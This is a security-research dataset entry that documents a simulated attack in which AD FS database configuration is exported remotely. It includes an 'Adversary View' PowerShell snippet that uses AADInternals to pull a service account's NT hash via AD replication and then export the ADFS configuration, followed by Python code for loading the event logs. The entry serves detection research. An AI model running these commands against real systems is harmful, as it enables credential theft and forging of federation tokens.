Export ADFS Database Configuration Remotely

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2021/04/27

Modification Date

2021/04/27

Tactics

TA0008

Techniques

T0000

Tags

None

Dataset Description

This dataset represents a threat actor exporting the AD FS database configuration remotely over http.

Simulation Metadata

Tools

type

Name

Module

PowerShell Module

AADInternals

Export-AADIntADFSConfiguration

Adversary View

# ADFS Service Account
$UserObjectGUID = 'd1713029-72e2-4101-8486-1db074944f23'
# Domain Admin credentials
$credentials = get-credential
# Get Hash via AD replication
$Hash = Get-AADIntADUserNTHash -ObjectGuid $UserObjectGUID -Credentials $credentials -Server 'DC01.blacksmith.local' -AsHex
# Retrieve AD FS database configuration over HTTP
$ADFSDatabaseConfig = Export-AADIntADFSConfiguration -Hash '97bff5626068f351a5f9891b97b04640' -SID 'S-1-5-21-3226634481-2224579835-4276826623-1103' -Server ADFS01.blacksmith.local

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/aadinternals_export_adfsdatabaseconfig_remotely.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)